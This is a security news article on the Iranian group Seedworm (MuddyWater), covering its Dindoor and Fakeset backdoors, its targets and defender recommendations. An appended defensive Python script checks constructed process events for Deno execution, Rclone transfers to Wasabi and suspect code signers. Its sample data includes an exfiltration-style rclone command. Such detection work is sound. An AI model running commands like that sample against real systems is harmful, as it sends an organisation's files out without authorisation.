Iran’s Seedworm APT group (also known as MuddyWater) has established persistent access inside the networks of multiple US organizations since early February 2026, deploying two previously unknown malware implants as geopolitical tensions between the US and Iran escalate.
New Backdoor Arsenal: Dindoor and Fakeset
Joint research from Symantec and Carbon Black has identified Seedworm activity on the networks of:
- A US bank – financial sector targeting
- A US airport – aviation infrastructure at risk
- Non-profit organizations – expanded targeting scope
- Israeli operations of a US defense/aerospace software company – supply chain infiltration
The group deployed two novel backdoors:
Dindoor – A sophisticated backdoor leveraging Deno, a runtime environment for JavaScript and TypeScript, to execute commands on infected machines. Dindoor was digitally signed with a certificate issued to an individual named “Amy Cherne.”
Fakeset – A Python-based backdoor also signed using certificates attributed to “Amy Cherne” and “Donald Gay.” The “Donald Gay” certificate has previously been associated with Stagecomp and Darkcomp malware used by Seedworm.
Attribution: Iran’s Ministry of Intelligence
Seedworm has been linked to Iran’s Ministry of Intelligence and Security (MOIS) and is known for espionage campaigns targeting government agencies, telecommunications companies, and critical infrastructure globally. The group’s focus on US and Israeli targets amid the current conflict leaves it dangerously well placed to launch follow-on attacks.
Researchers observed attackers using Rclone, an open-source file synchronization tool, to exfiltrate data from the compromised software company to Wasabi cloud storage – a clear indicator of espionage objectives.
Exposed VPS Reveals Broader Operation
In a related development, independent threat-intel research collective Ctrl-Alt-Intel accessed Seedworm infrastructure hosted in the Netherlands, harvesting C2 tooling, scripts, logs, and victim data. Their analysis revealed additional targets including:
- Israeli organizations (healthcare, hosting, immigration, intelligence)
- EgyptAir
- Jordanian government entities
- Various UAE companies
- US entities
- Jewish/Israeli-linked NGOs
The exposed infrastructure showed exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying campaigns, Ethereum-based C2 resolution, and multiple exfiltration channels spanning cloud storage and EC2 instances.
Why This Matters
With Iranian cyber operations potentially accelerating alongside the broader Middle East conflict, Seedworm’s pre-established network presence in US critical infrastructure represents a significant threat. The group continuously evolves its custom tooling while rapidly adopting public exploit code – a dangerous combination from a defender’s point of view.
Critical Recommendations:
- Hunt for Deno-based processes and unusual JavaScript/TypeScript execution
- Monitor for Rclone and cloud storage exfiltration patterns
- Audit certificate-signed executables, particularly those using “Amy Cherne” or “Donald Gay” certificates
- Review network traffic to Wasabi cloud storage
- Implement enhanced monitoring for defense and aerospace supply chain partners
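As an added illustration of the first three recommendations (not code from the article or from the researchers it cites), the script below triages constructed process-creation events for the indicators named above: Deno runtime execution, Rclone usage pointed at Wasabi, and executables signed under the “Amy Cherne” or “Donald Gay” names. The JSON event shape, the sample records, and the Wasabi endpoint domain (assumed to be wasabisys.com) are assumptions for the example.

```python
import json
import ntpath

# Signer names quoted in the article; matching is case-insensitive.
SUSPECT_SIGNERS = {"amy cherne", "donald gay"}
# Assumption: Wasabi's S3-compatible endpoints sit under this domain.
WASABI_DOMAIN = "wasabisys.com"

# Constructed sample telemetry (not real victim data): one JSON event per line,
# shaped like EDR process-creation records with an optional Authenticode signer.
SAMPLE_EVENTS = r"""
{"host":"ws01","image":"C:\\Users\\a\\deno.exe","cmdline":"deno run -A C:\\ProgramData\\svc.ts","signer":"Amy Cherne"}
{"host":"ws02","image":"C:\\Tools\\rclone.exe","cmdline":"rclone copy C:\\Finance remote:bucket --s3-endpoint s3.wasabisys.com","signer":null}
{"host":"ws03","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe","signer":"Microsoft Windows"}
{"host":"ws04","image":"C:\\Users\\b\\updater.exe","cmdline":"updater.exe","signer":"Donald Gay"}
"""


def classify(event):
    """Return the reasons (possibly none) this process event deserves analyst review."""
    exe = ntpath.basename(event.get("image", "")).lower()
    cmd = (event.get("cmdline") or "").lower()
    signer = (event.get("signer") or "").lower()
    reasons = []
    # Recommendation 1: Deno runtime launches are rare on most corporate endpoints.
    if exe == "deno.exe" or cmd.startswith("deno "):
        reasons.append("deno-runtime-execution")
    # Recommendation 2: Rclone is legitimate admin tooling, so escalate only when
    # the command line points at the cloud provider named in the report.
    if exe == "rclone.exe" or cmd.startswith("rclone "):
        reasons.append("rclone-wasabi-exfil" if WASABI_DOMAIN in cmd else "rclone-execution")
    # Recommendation 3: code-signing identities tied to the implants.
    if signer in SUSPECT_SIGNERS:
        reasons.append(f"suspect-signer:{signer}")
    return reasons


def triage(jsonl):
    """Parse newline-delimited JSON events and return only those that matched a rule."""
    findings = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append({"host": event["host"], "image": event["image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Plain Rclone use is reported at a lower tier than Rclone with a Wasabi endpoint, so the output can feed a ticket queue without drowning it in routine backup jobs.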
Source: Help Net Security
